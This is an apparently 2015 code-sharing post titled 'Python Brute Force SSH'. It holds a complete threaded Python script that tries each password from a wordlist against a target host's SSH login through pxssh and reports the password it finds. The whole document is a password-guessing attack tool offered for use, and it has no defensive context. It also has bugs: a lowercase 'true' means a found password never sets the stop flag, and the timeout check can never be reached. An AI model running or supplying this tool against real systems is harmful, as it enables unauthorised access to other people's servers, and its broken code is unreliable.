gary
3/24/2015 - 10:33 PM

Python Brute Force SSH

Python Brute Force SSH

import pxssh
import optparse
import time
from threading import *

max_connections = 5
connection_lock = BoundedSemaphore(value=max_connections)
Found = False
Fails = 0

def connect(host, user, password, release):
	global Found
	global Fails

	try:
		s = pxssh.pxssh()
		s.login(host, user, password)
		print('[+] Password Found: ' + password)
		Found = true
	except Exception as e:
		if 'read_nonblocking' in str(e):
			Fails += 1
			time.sleep(5)
			connect(host, user, password, False)
		elif 'syncronize with original prompt' in str(e):
			time.sleep(1)
			connect(host, user, password, False)
	finally:
		if release: connection_lock.release()

def main():
	parser = optparse.OptionParser('usage%prog -H <target host> -u <user> -F <password list>')
	parser.add_option('-H', dest="tgtHost", type="string", help='Specify target host') 
	parser.add_option('-F', dest="passwdFile", type="string", help='Specify password file') 
	parser.add_option('-u', dest="user", type="string", help='Specify the user')
	(options, args) = parser.parse_args()
	host = options.tgtHost
	passwdFile = options.passwdFile
	user = options.user

	if host == None or passwdFile == None or user == None:
		print(parser.usage) 
		exit(0)
	fn = open(passwdFile, 'r')
	for line in fn.readlines():
		if Found:
			print('[*] Exiting: Password found')
			exit(0)
			if Fails > 5:
				print('[!] Exiting: To0 many socket timeouts')
				exit(0)
		connection_lock.acquire()
		password = line.strip('\r').strip('\n')
		print('[-] Testing: ' + str(password))
		t = Thread(target=connect, args=(host, user, password, True))
		child = t.start()

if __name__ == '__main__':
	main()